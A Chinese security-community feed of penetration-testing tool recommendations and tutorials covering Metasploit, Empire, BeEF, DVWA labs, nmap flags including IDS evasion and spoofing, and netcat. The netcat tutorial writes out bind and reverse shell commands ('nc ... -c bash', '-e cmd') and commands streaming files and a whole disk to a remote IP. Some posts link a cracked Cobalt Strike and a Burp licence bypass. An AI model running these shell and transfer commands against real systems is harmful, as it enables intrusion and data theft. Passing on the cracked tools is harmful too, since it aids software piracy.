#工具#
渗透技能树之利器 v1
LanT34m 汇编整理 | 20170528 更新
这份“透技能树之利器”内容包括:
Windows、Linux、Tunnel、JavaScript、Browser、OSINT、Domain、Dir、Social-Engineer、Pentest、Exploit、Virus、Proxy、Java、CTF、DDoS、IoT、SSL、Web、Brute-Force、Fuzz、Port、Cyber、Search-Engineer、Wi-Fi、MITM、DNS、Docker、Android、OS、Defense、Hardware、Other
注1:这个仅分享在本圈,信息量不小,大家慢慢吸收,每个利器我们都玩过 注2:有的利器没加上链接,大家可以自行 Github/Google
详情见附件。
分享文件: 渗透技能树之利器 v1.pdf
#资源#
推荐 BlackHat Arsenal 兵工厂
兵工厂是全球黑帽大会(BlackHat)的一个重要环节,来自全球有能力的黑客在上面分享自己或团队独创的黑兵器。
这届,我看到官方开始号召大家共同维护这个 GitHub:
GitHub - toolswatch/blackhat-arsenal-tools: Official Black Hat Arsenal Security Tools Repository
去年我带团队分享了三个黑兵器(ZoomEye、Seebug、Pocsuite),得到了官方的友谊和好评。
这里准备响应官方号召,把我们的东西更新上去。
这上面好兵器真不少,推荐大家收藏学习研究。顺便在此号召下,好东西如果不是非得私有化,可以考虑开源,并在一些国际大会上分享出来,这样的交流氛围多好,对吧?
匿名用户 提问: 你好群主,有没有自动化渗透的东东,能够节省渗透工作中的精力时间的经验或工具,希望能够分享下。
余弦之前推荐过:DeathStar、BloodHound,你GitHub上可以找到,不用谢。
#资讯#
vault8 正确的打开方式
- Download zip archive
- make new directory, copy .git folder to there
- cd to new directory
- git reset --hard master
#基础#
bWAPP(buggy web Application)是一个集成了了常见漏洞的 web 应用程序,目的是作为漏洞测试的演练场(靶机),为 web 安全爱好者和开发人员提供一个测试平台,与 webgoat、dvwa 类似,小伙伴翻译的文章:
#工具#
Parrot 渗透操作系统
渗透操作系统,远不止 Kali,只是 Kali 确实做得不错,但是这类操作系统可做性其实很大很大。Parrot 包括安全测试、软件开发、隐私保护许多专业的工具,这个操作系统也是基于 Debian 深度定制的。
感兴趣的可以体验体验,不多说。
...
...
#经验#
最近我们在给一支开发团队培训 Java 开发安全相关的知识,其中有一个资源给大家分享下:
Bug Patterns - Find Security Bugs
这个是“Find Security Bugs”,官方描述是:
The FindBugs plugin for security audits of Java web applications.
这个插件可以集成进 Java 主流的 IDE 里,非常方便进行基本的代码安全审计工作。
目前 125 个漏洞规则,整体过下来就可以对 Java 安全生态有个比较全面的了解。
最近 Struts2 爆的 S2-055(我前几天有发圈里),Jackson 反序列化的问题,Find Security Bugs 第一时间就超前集成了,这点很赞!
#工具#
getsploit
本圈嘉宾@Moriarty 的分享。
getsploit
这是我用过的,迄今为止最好用的exploit搜索工具。首先,它支持在线搜索,它的exploit来自于 Exploit-DB, Metasploit, Packetstorm等等,并保持同步更新。它另一个更贴心的功能是可以指定-m参数,将搜索到的exploit自动下载下来(很方便的说)。另外它也支持离线,你只需要指定-u参数(--update),就可以将完整的exploit库离线到本地(目前数量大概在2亿2千万左右)。
项目地址:
GitHub - vulnersCom/getsploit: Command line utilit...
...
...
#资源#
推荐个资源,国庆在家喝茶追剧也不忘关注威胁情报,这几天看到一个针对软件供应链攻击-Kingslayer的paper,无意中发现了一个“好玩”的资源。
PocOrGTFO,GTFO指Get The Fuck Out,意指对一切Backdoor的情绪表达,有点极客的味道。PocOrGTFO包含了一系列牛人写的Paper,关键字就是Poc,可谓“干货”满满,量很多,得啃很久~
链接: GitHub - filcab/pocorgtfo: Mirror for the PoC || G...
当然,no starch press也出了纸质版(本人特别喜欢Paper里的一些插图),可谓是装B的利器。
BTW,这个出版社大家也可以关注一下,你看它官网上卖的什么书就知道了
官网地址: https://www.nostarch.com/
#姿势#
#工具#
快速构建一台 Metasploit 渗透 VPS
官方有方案:
Nightly Installers · rapid7/metasploit-framework W...
仔细参考很容易。
如果你买的 VPS 内存小,那么可以这样来解决 MSF 启动的这个错误:
virtual memory exhausted: Cannot allocate memory
# dd if=/dev/zero of=/swap bs=1024 count=1M
Format the swap file:
# mkswap /swap
Enable the swap file:
# swapon /swap
Enable swap on boot:
# echo "/swap swap swap sw 0 0" >> /etc/fstab
本质是加了个 swap 虚拟内存,用来解决物理内存过小导致的问题。
相关知识点请自行百度/Google。
...
...
#工具# #预告#
Metasploit是一款开源的渗透测试框架,自从它问世,仿佛人人都可以成为一名黑客。当然Metasploit之所以能成为最优秀的黑客工具,不只因为它命令满屏幕飞的逼格,更因为其有着令人难以置信的安全检测和漏洞利用功能。尤其在内网渗透中,更是无往而不利。在接下来,我将以Metasploit为基础,向大家分享内网渗透相关的知识
Metasploit
项目地址: GitHub - rapid7/metasploit-framework: Metasploit F...
安装方法: Setting Up a Metasploit Development Environment · ...
个人在渗透测试的时候,一般选择在VPS上搭建MSF(推荐,本圈前面有提),系统喜欢Ubuntu 如果嫌麻烦,也可以直接在本地用VMware安装kali2.0,自带msf。kali2.0安装方法: 虚拟机安装kali2.0_百度经验
...
...
#资源#
MSF入门练习平台
了解并使用VMware搭建Metasploitable2。 Metasploitable2 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,方便广大黑扩跟安全人员进行MSF漏洞测试跟学习,免去搭建各种测试环境。 VMware: 直接打开Metasploitable.vmdk即可使用 登陆账号密码:msfadmin msfadmin
Metasploitable2下载地址:
Metasploitable - Browse /Metasploitable2 at Source...
注:目前Metasploitable3也早就发布了,而且环境更贴近实战,不过Metasploitable2更适合MSF入门学习。 Metasploitable 3正式发布,附赠全球CTF大赛 - FreeBuf.COM | 关注黑...
#tools#
cobaltstrike3.8破解版
cobaltstrike3.8破解版 - 『安全工具区』 - 吾爱破解 - LCG - LSG |安...
...
...
#工具#
渗透利用神器 Empire 2.2 发布及一点看法
Empire 2.2 – Maintaining an Empire – rvrsh3ll’s Bl...
优化了一些问题及增加了一些特性,英文很简单自己看吧。还可以搜搜本圈,之前也发过历史相关。这些 Red Team 牛人在加速 Empire 发展,下一版本说是直接跳到 3.0。
特别说下,Empire 估计不会特别去发展混淆 Empire 技术,他们觉得和杀软们玩打地鼠游戏没意思。其实这个我赞同,文件静态免杀应该自己来,脚本混淆多简单的事。Empire 在渗透其他方面如绕过、伪装、隐藏一直在提升,不过对抗是动态的,不断进化是必然的。
Empire 确实是很优秀的渗透利用框架(其实就是个远控)。Empire 生态能发展还有个重要特性:
REST API。
#姿势#
DVWA 漏洞测试环境的搭建过程
DVWA 有在我们的安全技能树里提到,以下是 Win10 下的搭建过程,来自@丹青 同学的分享,踏了一些坑,都解决了,感兴趣的同学可以参考。
如果你也有什么经验可以分享到圈子内的可以私信我交流。
-
下载xampp,dvwa
-
解压dvwa-master,把解压后的文件夹名字改为dvwa
-
删除xampp文件夹里htdocs文件夹里的所有文件,然后把dvwa文件夹拷到htdocs文件夹里。
-
把dvwa文件夹里的config文件的扩展名(.dist)去掉,编辑config文件的内容,把p@ssw0rd去掉
-
用管理员权限打开xampp,点击start Apache,Mysql
-
在浏览器端输入
http://localhost/dvwa/setup.php -
点击creat database,然后出现登录界面,用户名是admin,密码是password
-
配置xampp控制台上的Apache,点击config中的PHP(php.ini),查找url_include,把它后面的Off改为On.
-
restart apache
-
成功!!!
ps:xampp的下载地址: XAMPP Installers and Downloads for Apache Friends
dvwa的下载地址: DVWA - Damn Vulnerable Web Application
视频教程地址: https://www.youtube.com/watch?v=cak2lQvBRAo&index=...
...
...
#工具#
浏览器利用框架 BeEF
BeEF(The Browser Exploitation Framework Project 的缩写) 是目前全球最好的开源浏览器利用框架,插件有很多,很值得参考学习。BeEF 这个缩写正好是牛肉的意思,所以玩这个玩多的人,一看到牛肉就想起了 BeEF。
玩前端黑客,如果能玩透 BeEF,在前端黑的利用方面就基本没什么大问题了,姿势非常的多。
命令行下一键安装方式:
curl -L https://raw.githubusercontent.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
详细安装过程:
Installation · beefproject/beef Wiki · GitHub
使用:
./beef
BeEF 是基于 Ruby 编写的,数据库使用的是 SQLite。如果你正好在学 Ruby 且这么喜欢安全,BeEF 是个不错的参考。
...
...
匿名用户 提问: 余弦大大,我可以不可以把beef理解为一个网络探针,并顺便有着浏览器漏洞利用工具的一个框架
可以。
#姿势#
在做网络分析这块,推荐最原生的命令 tcpdump
“只要和网络沾边,都可以使用 tcpdump 来排查问题。”
这篇文章作为 tcpdump 指南来说可供参考,虽然来说还是简单点,不过大多时候,我们不是职业做流量分析的,够用:
我 N 年前因为要调试一套复杂架构的网络问题,第一次上了 tcpdump,并结合 Wireshark 在本机进行可视化分析,效果很直接,一些复杂的问题容易找出本质。
...
...
#工具#
Nmap 7.50 正式发布:
Download the Free Nmap Security Scanner for Linux/...
新增 14 个 NSE 脚本,300 多个指纹规则。
Nmap 是玩安全的人必备的工具,无论攻防都必备,基于 Nmap 写插件(NSE 脚本)很容易,只需掌握 lua 脚本语言即可。
有同学问扫描器问题,其实能玩精 Nmap,这就是一款非常强大的扫描器,包括漏洞扫描!
...
这里有篇nmap入门的文章,没接触过nmap的同学可以看下, 乌云知识库还有很多其他的好教程可以搜索 :)
...
半夜问下:谁想成为本圈嘉宾的可以私信我。嘉宾义务:每周至少分享一条干货,促进本圈的发展。好处:成为我们这个虚拟团队成员,这个虚拟团队目前有 4 人,最终不会超过 10 人。😘
...
...
#工具#
神兵利器之nmap 好吧,又是一个老套的工具,没有人不知道它,本来我是想开篇一个msf系列的,但是觉得nmap不管在渗透还是网络管理中都是必不可少的工具,必须熟练掌握那种,我敢打赌,密圈里50% 以上的人并不能熟练运用它。 有的人会说,不就是是扫描器吗?单个IP扫,整个网段扫,个别端口扫,我都会啊,大不了需要的时候再来查参数了。好吧,不过类似书到用时方知少一样,常用的工具熟练掌握是会对工作效率有很大提升的。 废话不多说,本来我是打算自己详细写写各个参数用法的,发现网上已经有非常详细的教程了,我就在基础上增加一些自己的经验吧。
本文由阿德马翻译自国外网站,请尊重劳动成果,转载请注明出处,谢谢 Nmap是一款网络扫描和主机检测的非常有用的工具。 Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统。Nmap是一款非常强大的实用工具,可用于:
- 检测活在网络上的主机(主机发现)
- 检测主机上开放的端口(端口发现或枚举)
- 检测到相应的端口(服务发现)的软件和版本
- 检测操作系统,硬件地址,以及软件版本
- 检测脆弱性的漏洞(Nmap的脚本)
Nmap是一个非常普遍的工具,它有命令行界面和图形用户界面。本人包括以下方面的内容:
- 介绍Nmap
- 扫描中的重要参数
- 操作系统检测
- Nmap使用教程
Nmap使用不同的技术来执行扫描,包括:TCP的connect()扫描,TCP反向的ident扫描,FTP反弹扫描等。所有这些扫描的类型有自己的优点和缺点,我们接下来将讨论这些问题。
Nmap的使用取决于目标主机,因为有一个简单的(基本)扫描和预先扫描之间的差异。我们需要使用一些先进的技术来绕过防火墙和入侵检测/防御系统,以获得正确的结果。下面是一些基本的命令和它们的用法的例子:
扫描单一的一个主机,命令如下:
nmap nxadmin.com
nmap 192.168.1.2
扫描整个子网,命令如下:
nmap 192.168.1.1/24
扫描多个目标,命令如下:
nmap 192.168.1.2 192.168.1.5
扫描一个范围内的目标,如下:
nmap 192.168.1.1-100 (扫描IP地址为192.168.1.1-192.168.1.100内的所有主机)
如果你有一个ip地址列表,将这个保存为一个txt文件,和namp在同一目录下,扫描这个txt内的所有主机,命令如下:
nmap -iL ip.txt (该文件里面,一行保存一个ip)
如果你想看到你扫描的所有主机的列表,用以下命令: nmap -sL 192.168.1.1/24
(适用于快速列出该网段的存活主机,我一般这样用 nmap -sL 192.168.1.1/24 |grep "(*)"目的是仅列出存活的)
扫描除过某一个ip外的所有子网主机,命令:
nmap 192.168.1.1/24 -exclude 192.168.1.1
扫描除过某一个文件中的ip外的子网主机命令
nmap 192.168.1.1/24 -exclude file xxx.txt (xxx.txt中的文件将会从扫描的主机中排除)
扫描特定主机上的80,21,23端口,命令如下
nmap -p80,21,23 192.168.1.1
在每次命令都加上 -v 或者-vv 参数,会详细显示扫描的过程,不然你就等待一段时间,直接看结果。
从上面我们已经了解了Nmap的基础知识,下面我们深入的探讨一下Nmap的扫描技术.
✊Tcp SYN Scan (sS) 这是一个基本的扫描方式,它被称为半开放扫描,因为这种技术使得Nmap不需要通过完整的握手,就能获得远程主机的信息。Nmap发送SYN包到远程主机,但是它不会产生任何会话.因此不会在目标主机上产生任何日志记录,因为没有形成会话。这个就是SYN扫描的优势. 如果Nmap命令中没有指出扫描类型,默认的就是Tcp SYN.但是它需要root/administrator权限. (这里我简单讲一下TCP 和SYN的区别,TCP有完整的三次握手过程,就是扫描器发包到探测目标上,然后目标会再返回确认包,然后双方确认后再传送数据,TCP过程繁琐当然扫描效率不高,并且有交互过程所以会在目标上留下日志。而SYN只是TCP三次握手中第一次握手的请求包,扫描过程速度快并且不会在目标上留下日志,我这里只是通俗的讲一下,不了解TCP的,参考这里 简析TCP的三次握手与四次分手 | 果冻想)
nmap -sS 192.168.1.1
✊Tcp connect() scan(sT) 如果不选择SYN扫描,TCP connect()扫描就是默认的扫描模式.不同于Tcp SYN扫描,Tcp connect()扫描需要完成三次握手,并且要求调用系统的connect().Tcp connect()扫描技术只适用于找出TCP和UDP端口.
nmap -sT 192.168.1.1
Udp scan(sU) 顾名思义,这种扫描技术用来寻找目标主机打开的UDP端口.它不需要发送任何的SYN包,因为这种技术是针对UDP端口的。UDP扫描发送UDP数据包到目标主机,并等待响应,如果返回ICMP不可达的错误消息,说明端口是关闭的,如果得到正确的适当的回应,说明端口是开放的.
nmap -sU 192.168.1.1
✊FIN scan (sF) 有时候Tcp SYN扫描不是最佳的扫描模式,因为有防火墙的存在.目标主机有时候可能有IDS和IPS系统的存在,防火墙会阻止掉SYN数据包。发送一个设置了FIN标志的数据包并不需要完成TCP的握手.
root@bt:~# nmap -sF 192.168.1.8
Starting Nmap 5.51 at 2012-07-08 19:21 PKT
Nmap scan report for 192.168.1.8
Host is up (0.000026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
111/tcp open|filtered rpcbind
FIN扫描也不会在目标主机上创建日志(FIN扫描的优势之一).个类型的扫描都是具有差异性的,FIN扫描发送的包只包含FIN标识,NULL扫描不发送数据包上的任何字节,XMAS扫描发送FIN、PSH和URG标识的数据包.(如果你懂tcp协议,就知道FIN是TCP中一个请求断开的标志)
PING Scan (sP) PING扫描不同于其它的扫描方式,因为它只用于找出主机是否是存在在网络中的.它不是用来发现是否开放端口的.PING扫描需要ROOT权限,如果用户没有ROOT权限,PING扫描将会使用connect()调用.
nmap -sP 192.168.1.1
✊版本检测(sV) 版本检测是用来扫描目标主机和端口上运行的软件的版本.它不同于其它的扫描技术,它不是用来扫描目标主机上开放的端口,不过它需要从开放的端口获取信息来判断软件的版本.使用版本检测扫描之前需要先用TCP SYN扫描开放了哪些端口.
nmap -sV 192.168.1.1
Idle scan (sI)(s后面是大写I) Idle scan是一种先进的扫描技术,它不是用你真实的主机Ip发送数据包,而是使用另外一个目标网络的主机发送数据包.
nmap -sI 192.168.1.6 192.168.1.1
Idle scan是一种理想的匿名扫描技术,通过目标网络中的192.168.1.6向主机192.168.1.1发送数据,来获取192.168.1.1开放的端口 (这个idle scan,是不能随便想利用哪个ip做为掩饰的,必须找到idle也就是空闲的主机,这个可以到后面我介绍msf知识的时候,有方法可以探测哪个主机目前是idle状态可以拿来掩盖自己ip) 另外还有其它的扫描方式,如 FTP bounce(FTP反弹), fragmentation scan(碎片扫描), IP protocol scan(IP协议扫描),以上讨论的是几种最主要的扫描方式.
✊Nmap的OS检测(O) Nmap最重要的特点之一是能够远程检测操作系统和软件,Nmap的OS检测技术在渗透测试中用来了解远程主机的操作系统和软件是非常有用的,通过获取的信息你可以知道已知的漏洞。Nmap有一个名为的nmap-OS-DB数据库,该数据库包含超过2600操作系统的信息。 Nmap把TCP和UDP数据包发送到目标机器上,然后检查结果和数据库对照。
Initiating SYN Stealth Scan at 10:21
Scanning localhost (www.nxadmin.com) [1000 ports]
Discovered open port 111/tcp on www.nxadmin.com
Completed SYN Stealth Scan at 10:21, 0.08s elapsed (1000 total ports)
Initiating OS detection (try #1) against localhost (www.nxadmin.com)
Retrying OS detection (try #2) against localhost (www.nxadmin.com)
上面的例子清楚地表明,Nmap的首次发现开放的端口,然后发送数据包发现远程操作系统。操作系统检测参数是O(大写O)
Nmap的操作系统指纹识别技术:
- 设备类型(路由器,工作组等)
- 运行(运行的操作系统)
- 操作系统的详细信息(操作系统的名称和版本)
- 网络距离(目标和攻击者之间的距离跳)
如果远程主机有防火墙,IDS和IPS系统,你可以使用-PN命令来确保不ping远程主机,因为有时候防火墙会组织掉ping请求.-PN命令告诉Nmap不用ping远程主机。
nmap -O -PN 192.168.1.1/24
以上命令告诉发信主机远程主机是存活在网络上的,所以没有必要发送ping请求,使用-PN参数可以绕过PING命令,但是不影响主机的系统的发现.
Nmap的操作系统检测的基础是有开放和关闭的端口,如果OS scan无法检测到至少一个开放或者关闭的端口,会返回以下错误: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
nmap -A 192.168.1.1
这个-A 是直接包含了很多功能,免去了敲多个参数的操作,所探测的信息,留给你去动手试一下吧。
在msf里面是可以调用nmap的,输入db_nmap 直接调用,扫描结果保存到msf数据库中。 一下子就长篇大论了,大多数人肯定都不会看完,这种必会的工具,还是建议每个参数都去敲着看看效果吧! 另外附上 新手小伙伴容易上手的视频:
https://www.ichunqiu.com/course/1219
当然还有更全面从入门到精通的资料:
里面包含所有参数的详细讲解,其中的躲避IDS侦测值得好好掌握。 我准备上msf系列了,大家有什么建议?
...
--max-rtt-timeout 2000ms 连接超时为2000毫秒
--max-retries 3 丢包重试最多3次
--max-scan-delay 2s 发包间隔时间最多2秒
--host-timeout 30m 每台主机最多扫描30分钟
...
#基础#
nmap是渗透测试中一款必不可少的神器,它可以做包括端口扫描,主机发现,服务识别,系统探测等一系列的操作,圈中有过相关资料,不过没有把全部参数列出来,下面我把nmap全参数的作用列出来,仅供参考,因为有一些太过偏僻的参数我也不了解,仅凭我匮乏的六级直译。话不多说,直接上参数
目标发现:
-iL:使用ip列表文件
-iR:扫描随机ip,参数后面跟扫描的地址的数量
--exclude:不扫描某一个地址,比如说扫一个ip地址段但是又不想扫描其中的某一个地址,就使用这个参数
eg:nmap 192.168.1.0/24 --exclude 192.168.1.1-100:从100开始扫描
--excludefile:不扫描文件中的所有地址
主机发现:
-sL:不做扫描,列出目标地址段,看看是不是你想扫描的额地址段,等于子网掩码计算
-sn:不做端口扫描
-Pn:默认主机是活的,因为有时候主机不回包,扫描防火墙很有用
-PS/PA/PU/PY:使用SYN/ACK/UDP/SCTP(不是TCP/IP范畴,是VUIP范畴的协议,用来传语音)进行发现
-PE:使用ICMP探测,时间戳和子网掩码,一般子网掩码不会成功
-PO:使用ip协议扫描(ip protocol ping)
-n/-R:不做DNS解析/做反向解析
--dnsserver:在nmap做dns解析时,使用指定的dns服务器,不用默认指定的dns服务器
--system-dns:使用系统的dns,加不加都差不多
--traceroute:扫描的时候进行路由追踪
端口发现:
-sS/sT/sA/sW/sM TCP SYN/Connect()/ACK/Windows/Maimon scan:SYN扫描,建立完整的TCP三次握手/窗口扫描/使用Fin+ACK扫描
-sU:使用UDP扫描
-sN/sF/sX:TCP NULL,FIN,and Xmas scans:没有标签的包,FIN包,FIN+PSH+URG包
--scanflags:自定义TCP的flags
-sI:zombie scan:僵尸扫描
-sY/sZ:SCTP协议扫描(不了解)
-sO:IP扫描
-b:FTP中继扫描
端口指定和端口识别
-p:指定端口
--exclude-ports:指定不扫描的端口
-F:使用快速模式,一般默认扫描1000个端口
-r:使用顺序端口扫描,一般扫描的时候是使用随机端口扫描
--top-ports:扫描前n个端口
--port-ratio:扫描更常见的端口
服务扫描:
-sV:进行服务识别,并进行特征库的识别,一般不会对nmap的所有特征库进行匹配
--version-intensity:进行深度匹配的程度,从0~9
--version-light:进行轻量级的探测,等于version-intensity 2级别
--version-all:进行重量级的探测,等于version-intensity 9级别
--version-trace:显示所有的探测细节
脚本扫描:
-sC:等于 --script=default
--script:后接lua脚本
--script-args:指定脚本的参数
--script-args-file:后接一个参数列表文件,使用文件里的参数
--script-updatedb:更新脚本数据库
--script-help:显示某个脚本的帮助信息
操作系统探测:
-O:系统检测,包括内核信息
--osscan-limit: 限制要扫描的系统,比如只扫描win系统
--osscan-guess:对操作系统进行更有攻击性的猜测
时间和性能:太快的扫描可能引起目标系统的警报系统报警,并且影响性能
-T<0-5>:设置时间模板(字面翻译),越高越快,越低越慢
--min-hostgroup/max-hostgroup:最小/最大并行扫描的主机组,最多/最少一次扫多少个主机
--min-paralleism/max-paralleism:最小/最大的并行数量
--min-rtt-timeout/max-rtt-timeout/initial-rtt-time<time>:设置探测包的最大/最小/最初的来回时间, rtt:run trip time
--max-retries <tries>:设置最大重试次数,预防网络质量不好,但是越多探测包越容易被发现
--host-timeout <time>:设置最大超时时间,过了这个时间可以认为主机是down的或者端口不开放
--scan-delay/--max-scan-delay <time>: 设置每次探测之间的延迟,基本/最大延迟
--min-rate <number>:设置最小扫面级别,使扫描不少于<number>个包每秒
--man-rate <number>:设置最大扫描几倍,使扫描不大于<bumber>个包每秒
防火墙/IDS躲避和欺骗
-f /--mtu:<val>:设置最大传输路径单元,最大的MTU单元是由最小的传输单元决定的,比如网络中某个路径mtu是123,你的是124,通过-f参数,可以设置mtu
-D <decoy1 decoy2>[,ME],......>:通过噪声进行地址欺骗
-S:欺骗源地址
-E:指定网卡
-g:指定源端口
--proxies:指定代理,掩护自己
--data <hex strings>:除了正常的探测,在数据包中加入自己的数据,这个数据必须是十六进制
--data-string <string>:添加ASCII码
--data-lentgh <nums>:限制数据长度
--ip-option <option>:发送有特定ip选项的探测包
--ttl <val>:设置ttl值
--spoof-mac <mac address/prefix/vendor name>:欺骗源MAC地址
--badsum:发送异常校验值的包,欺骗某些防火墙
输出:
-oN/-oX/-oS/-oG:指定输出的文件类型
-oA: <basename>:输出三种主要格式
-v:显示详细信息
-d:增加debug程度
--reason:显示某个异常或者特别的端口
--open:只显示开放或者可能开放的端口
--packet-trace:包追踪
--iflist:打印主机的网卡接口和路由(用于debug)
--append-output:没使用过,不清楚
--resume <filename>:重新开始一个失败的扫描
--stylesheet <path/URL>:将输出转换成XML格式并且以html输出
--webxml:参考Nmap.org上的样式制作更加轻量级的xml
--no-stylesheet:不解析成任何扩展性语言
杂项:
-6:允许ipv6的探测
-A:组合系统探测、系统版本探测,脚本扫描和路由追踪
--send-eth/--send ip:使用原始以太网和ip包进行发送
--datadir <dirname>:查找nmap数据的执行目录
--unprivileged:假定用户没有原始socket权限
--privileged:假定用户是最高权限的
-V:显示版本信息
-hL:打印帮助菜单
用了一个下午翻译,如果有错误可以留言,大家互相交流
...
...
#工具#
基础工具篇之NC NC 是一个大家都知道的经典工具,可以说它已经比较老旧了,但是我还是认为从事安全工作必须能熟练应用它,因为它不仅功能强大,最最重要是类Linux系统都内置已经存在了。估计大多数人对它功能知晓不全。
- 监听端口
nc -l -p 5000(-l设置监听模式;-p设置监听端口),这个大家用的最多可能是拿来接收反弹shell,就不多说了。 - 连接端口
nc -nv 192.168.1.1 80(-n 设置不解析域名,直接通过ip来连接; -v 显示详细的输出内容),IP后面跟的是要连 接的端口,用的最多的应该还是直接连接一个开了监听端口的后门,其实它可以连接一些端口获取banner并执行一 些指令模拟发包。 一端执行监听,一边用nc连接,那么双方可以发送一些文本信息,来模拟一个聊天工具,当然这在实际中没什么 用,不过变通一下就能起到作用了。 A:nc -lp 5000B:ps | nc -nv 192.168.1.1 5000A监听端口,B执行命令并将命令回显通过nc传输到A端的屏幕上显示,这常常应用在一些电子取证的场景上,我 们不希望在取证目标磁盘上写入任何东西。就可以通过这种方式来采集目标上的一些信息。 当然你A端可以直接nc -l -p 5000 > ps.txt,将接收到的信息直接写入文件。 - 传输文件
A:
nc -lp 5000 > 123.logB:nc -nv 192.168.1.1 5000 < /var/message.log -q 1(这里-q代表传输完成后1 秒就断开连接) 也可以变换成这样反向来传输 A:nc -nv 192.168.1.1 5000 > 123.logB:nc -lp 5000 < /var/message.log -q 1(谁连接这个端口,就自动把message.log发送过去) - 传输目录
A:
tar -cvf - /tmp | nc -lp 5000 -q 1(先将/tmp 目录进行打包注意cvf 后面有一个(-)符合,并通过管道符 将数据重定向到nc监听上) B:nc -nv 192.168.1.1 5000 | tar -xvf -(接收到的数据重定向给tar解包) - 端口扫描
nc -nvz 192.168.1.1 1-65535(-z代表扫描模式,不会进行I/O 信息交换,仅仅探测端口开放)nc -nvzu 192.168.1.1 1-65535(-u 代表通过upd方式扫描) nc肯定不能代替扫描器,精确度也不怎么好,不建议使用。 - 硬盘克隆
A:
nc -lp 5000 | dd of=/dev/sda(nc监听5000端口,将接收到的数据,通过dd of,将数据完整写到/dev /sda 磁盘上) B:dd if=/dev/sda | nc -nv 192.168.1.1 5000 -q 1(通过dd if 将/dev/sda 硬盘进行克隆,这个是从硬盘底 层数据的扇区、块上进行复制,克隆出来将会是状态完全一样的硬盘,通过管道重定向给nc命令并传送到远程ip上) 这个功能常常会用在电子取证上,克隆出一个一样的硬盘,进行数据分析。当然不仅复制硬盘,也可以复制受害机 器的内存。(/proc 文件夹下是内存中的数据) - 发送shell
A:
nc -lp 5000 -c bash(-c 调用bash做为交互,如果是windows下改为-e cmd) B:nc -nv 192.168.1.1 5000当然也可以反向发送shell A:nc -nv 192.168.1.1 5000 -c bashB:nc -lp 5000
弦哥,刚刚转的TK传授的学习方法,学习一个工具,要去看它每个参数,并弄懂其作用,现附上参数中文翻译
语法 nc/netcat(选项)(参数) 选项
-g<网关>:设置路由器跃程通信网关,最多设置8个;
-d 无命令行界面,使用后台模式
-c 程序重定向,比如-c bash,nc传输过来的数据就会指向bash去执行
-e 这个也是程序重定向,用在windows下
-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助; -i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
-l:使用监听模式,监控传入的资料;
-L:也是用作监听,不过监听端不终止nc的话,连接端终止后,监听端依然保持监听状态。
-n:直接使用ip地址,而不通过域名服务器;
-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p<通信端口>:设置本地主机使用的通信端口;
-r:指定源端口和目的端口都进行随机的选择;
-s<来源位址>:设置本地主机送出数据包的IP地址;
-u:使用UDP传输协议;
-v:显示指令执行过程;
-w<超时秒数>:设置等待连线的时间,一般扫描时加上;
-z:使用0输入/输出模式,只在扫描通信端口时使用。
欢迎大家提交更多的使用方法!
...
...
#姿势#
#python#
刚好之前ke分享了netcat的使用,这次为大家分享一下如何使用python编写一个简单的python版的netcat。
python编写简单netcat | D_infinite的小站
还是一样,有任何问题和建议欢迎评论区留言,�咱们共同分享,共同进步。
#工具#
推荐 katoolin 快速安装 Kali 任意工具
GitHub - LionSec/katoolin: Automatically install a...
Ubuntu 下体验还不错,看源码可以发现是添加了 Kali 的源,然后 apt-get install 安装。
有时候我们的 VPS 是 Ubuntu,想快速安装一些 Kali 里的好工具,就用 katoolin 即可。
BTW:很多开源工具都是 Python 写的,我们在用爽的同时不妨学习下其源码,如果发现 bug 还可以去对应的 GitHub 上提交修正。这种互动很值得鼓励。
#工具#
Burp Suite 1.7.26 发布,其中增加了个先进功能“文件上传漏洞发现”,支持这些格式的嵌入上传: PDF, SVG, HTML, PHP, SSI.
并且支持外带回显。
Web 黑必备神器,有钱就买吧,没钱就等破解版。
http://releases.portswigger.net/2017/08/1726.html
#姿势#
自己动手丰衣足食 :一个bat解决burp过期问题
来自@h4ck0ne 的分享,很赞这种分享!
分享文件:
[解决全版本burp时间过期问题 -h4ck0ne.docx](https://github.com/ChrisLinn/greyhame-2017/blob/master/shared-files/解决全版本burp时间过期问题 -h4ck0ne.docx)
玩黑手的大伙儿估计都知道nethunter,很不错的黑手套装,只是有些机型比较难刷。今天推一个不一样的黑手玩法:How about a complete Linux on your phone?
Linuxdeploy(play商店有下)能够在root过的安卓手机上安装完整Linux系统,目前支持的发行版有Debian, Ubuntu, Kali Linux, Arch Linux, Fedora, CentOS, Gentoo, openSUSE, Slackware, RootFS 功能非常之强大,还支持好几种GUI,更多功能有待大家慢慢把玩
Play商店下载地址 https://play.google.com/store/apps/details?id=ru.m...
另外,linuxdeploy还是开源的!
GitHub - meefik/linuxdeploy: Install and run GNU/L...
有的同学可能会觉得手机上键盘是个痛点,没关系我们有hacker keyboard
https://play.google.com/store/apps/details?id=org....
What you can do on Linux, you can do the same on your PHONE
匿名用户 提问: 看到小密圈安全平台,毫不犹豫的订了,想问一下,一直困扰我的问题,在国外有专门有基于互联网信息收集的工具,有基于twitter,或facebook的信息收集工具如meltago,有google hacking,在国内有类似基于QQ号码或微搏帐号收集工具吗,如果有,有哪些,非常感谢。有类似baidu hacking的东西吗
暂时没看到这样全面的,国内这种环境,限制了这类工具的发展与分享。
不过前几天我们看到这个:
GitHub - jm33-m0/massExpConsole: adding more exploits and tools
里面有集成国内的 Baidu、ZoomEye,可以看看。
顺便补充,这类工具我们称为 OSINT,在之前发布的“渗透技能树之利器”里有专门归类。
如果谁写了个这样的好工具,可以分享一下。
...
...
#HITB#
早上最期待的议题来了,红队!
刚刚看到公布的一个调研工具:
LinkedInt
GitHub - mdsecactivebreach/LinkedInt: LinkedInt: A...
A LinkedIn scraper for reconnaissance during adversary simulation.
专门针对 LinkedIn 做调研的小工具。
#工具#
HTTP 响应头安全审计工具
GitHub - m3liot/shcheck: Just a small tool to chec...
Python 写的,代码很短很简单,审计原理也特别简单,审计如下响应安全头是否存在:
sec_headers = {
'X-XSS-Protection': 'warning',
'X-Frame-Options': 'warning',
'X-Content-Type-Options': 'warning',
